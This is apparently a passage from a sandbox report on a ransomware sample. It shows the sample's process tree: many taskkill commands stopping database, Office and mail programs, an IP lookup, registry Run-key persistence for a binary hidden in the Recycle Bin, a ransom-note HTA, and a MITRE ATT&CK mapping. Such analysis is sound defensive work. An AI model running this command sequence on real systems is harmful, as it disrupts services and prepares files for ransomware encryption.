- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im synctime.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopqos.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im isqlplussvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xfssvccon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocautoupds.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im encsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im firefoxconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tbirdconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocomm.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld.exe
    3⤵
    - Kills process with taskkill
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-nt.exe
    3⤵
    - Kills process with taskkill
    PID:664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-opt.exe
    3⤵
    - Kills process with taskkill
    PID:804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbeng50.exe
    3⤵
    - Kills process with taskkill
    PID:468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqbcoreservice.exe
    3⤵
    - Kills process with taskkill
    PID:668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im excel.exe
    3⤵
    - Kills process with taskkill
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im infopath.exe
    3⤵
    - Kills process with taskkill
    PID:1224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msaccess.exe
    3⤵
    - Kills process with taskkill
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mspub.exe
    3⤵
    - Kills process with taskkill
    PID:1784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im onenote.exe
    3⤵
    - Kills process with taskkill
    PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im outlook.exe
    3⤵
    - Kills process with taskkill
    PID:1772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im powerpnt.exe
    3⤵
    - Kills process with taskkill
    PID:1380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im steam.exe
    3⤵
    - Kills process with taskkill
    PID:284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat.exe
    3⤵
    - Kills process with taskkill
    PID:916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat64.exe
    3⤵
    - Kills process with taskkill
    PID:556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thunderbird.exe
    3⤵
    - Kills process with taskkill
    PID:296
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im visio.exe
    3⤵
    - Kills process with taskkill
    PID:1304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im winword.exe
    3⤵
    - Kills process with taskkill
    PID:1584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wordpad.exe
    3⤵
    - Kills process with taskkill
    PID:1456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %date%-%time%
  2⤵
  PID:1056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:1352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
  2⤵
  PID:612
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
    3⤵
    - Modifies registry key
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:896
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
    3⤵
    - Adds Run key to start application
    PID:1104
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
  2⤵
  - Modifies Internet Explorer settings
  PID:1204
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
  2⤵
  - Modifies Internet Explorer settings
  PID:1724

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:960

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1c0
1⤵
PID:1692

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
1⤵
PID:860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/960-64-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/1152-2-0x00000000760C1000-0x00000000760C3000-memory.dmp

Filesize
8KB

Download
memory/2032-67-0x000007FEF6010000-0x000007FEF628A000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads